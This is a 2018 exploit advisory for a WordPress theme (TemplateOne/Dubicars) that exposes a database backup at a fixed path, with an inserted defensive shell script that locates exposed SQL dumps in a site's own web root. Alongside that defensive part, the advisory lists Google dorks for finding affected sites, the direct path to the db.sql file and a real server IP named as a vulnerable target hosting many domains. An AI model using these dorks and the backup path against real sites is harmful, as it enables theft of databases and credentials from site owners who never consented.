
WordPress TemplateOne Themes Dubicars Database Backup Information Disclosure Vulnerability

Author: KingSkrupellos, Published: 23-11-2018
#################################################################################################

# Exploit Title : WordPress TemplateOne Themes Dubicars Database Backup Information Disclosure Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 19/11/2018
# Vendor Homepage : wordpress.org ~ dubicars.com
# Tested On : Windows and Linux
# Category : WebApps
# Version Information : All Current Versions
# Google Dorks :
inurl:''/wp-content/themes/templateone/''
intext:''© Copyright 2015 | Powered by Dubicars''
intext:''© Copyright 2017 | Powered by Dubicars''
intext:''© Copyright 2018 | Powered by Dubicars''
intext:''Powered by Dubicars''
# Exploit Risk : Medium
# CWE : CWE-264 - [ Permissions, Privileges, and Access Controls ]
CWE-23 - [ Relative Path Traversal ]
CWE-200 - [ Information Exposure ]

#################################################################################################

# Admin Panel Login Path :

/wp-login.php

# Exploit :

/wp-content/themes/templateone/db.sql
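
# Added example (not part of the original advisory) :

A shell check that a site owner can run against their own document root to find database dumps left under wp-content, such as the templateone/db.sql file named above, before the web server hands them out as static files. The function names and the list of dump extensions are assumptions made for this example.

```shell
#!/bin/sh
# Added defensive example: locate database dump files inside a WordPress
# document root, where the web server would serve them as static files.

# find_exposed_dumps DOCROOT
# Prints one path per line for every dump-named file under DOCROOT/wp-content.
# Returns 2 when DOCROOT has no wp-content directory.
find_exposed_dumps() {
    docroot=$1
    [ -d "$docroot/wp-content" ] || return 2
    find "$docroot/wp-content" -type f \
        \( -iname '*.sql' -o -iname '*.sql.gz' \
           -o -iname '*.sql.bz2' -o -iname '*.sql.zip' \) -print
}

# looks_like_dump FILE
# True when the first lines of FILE contain plain-text SQL dump statements.
# Compressed dumps do not match and are reported by name only.
looks_like_dump() {
    head -n 200 "$1" 2>/dev/null |
        grep -Eiq '^(CREATE TABLE|INSERT INTO|DROP TABLE|-- MySQL dump)'
}

# audit_docroot DOCROOT
# Prints each finding. Returns 0 if clean, 1 if dumps were found, 2 on error.
audit_docroot() {
    findings=0
    tmp=$(mktemp) || return 2
    find_exposed_dumps "$1" > "$tmp" || { rm -f "$tmp"; return 2; }
    # Read from a file, not a pipe, so the counter survives the loop.
    while IFS= read -r f; do
        findings=$((findings + 1))
        if looks_like_dump "$f"; then
            kind="SQL dump"
        else
            kind="dump-named file"
        fi
        echo "EXPOSED ($kind): $f"
    done < "$tmp"
    rm -f "$tmp"
    [ "$findings" -eq 0 ]
}
```

Source the file and call audit_docroot with the site's document root; any file it reports should be moved outside the web root or deleted, and credentials contained in it rotated.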

#################################################################################################

# Example Vulnerable Sites =>

Vulnerable IP Address => (108.179.230.34)

There are 236 domains hosted on this server.


#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

#################################################################################################
